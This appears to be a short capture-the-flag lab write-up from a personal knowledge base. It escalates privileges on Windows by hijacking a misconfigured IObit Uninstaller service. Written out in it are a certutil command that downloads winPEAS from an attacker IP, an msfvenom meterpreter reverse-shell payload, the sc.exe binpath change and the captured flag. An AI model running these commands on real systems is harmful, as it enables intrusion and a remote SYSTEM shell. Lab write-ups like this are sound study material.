Malleum Knowledge Base

Priv Esc

2 min read

Getting winPEAS

certutil.exe -urlcache -split -f http://10.10.14.4/winPEASx64.exe
   IObit Uninstaller Service
   =================================================================================================
 
    IUFileFilter(IObit - IUFileFilter)[\??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IUFileFilter.sys] - System - No quotes and Space detected
   =================================================================================================
 
    IUProcessFilter(IObit - IUProcessFilter)[\??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IUProcessFilter.sys] - System - No quotes and Space detected
   =================================================================================================
 
    IURegistryFilter(IObit - IURegistryFilter)[\??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IURegistryFilter.sys] - System - No quotes and Space detected

Insecure service Properties

 
sc.exe qc sc.exe qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   :
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

The binary path is empty maybe be I should give it a try. Not able to check if i can change the config.

MSFvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=1235 -f exe -o reverse.exe

Setting the Binary path

sc.exe config IObitUnsvr binpath="C:\Users\dharding\Documents\prompt.exe"

Again check the service

*Evil-WinRM* PS C:\Users\dharding\Documents> sc.exe qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Users\dharding\Documents\prompt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Starting the service

sc.exe start IObitUnSvr

The session is dying fast so powershell script to get nc shell.

Getting the Flag

PS C:\Users\Administrator\Desktop> type flag.txt
DANTE{Qu0t3_I_4M_secure!_unQu0t3}

Graph View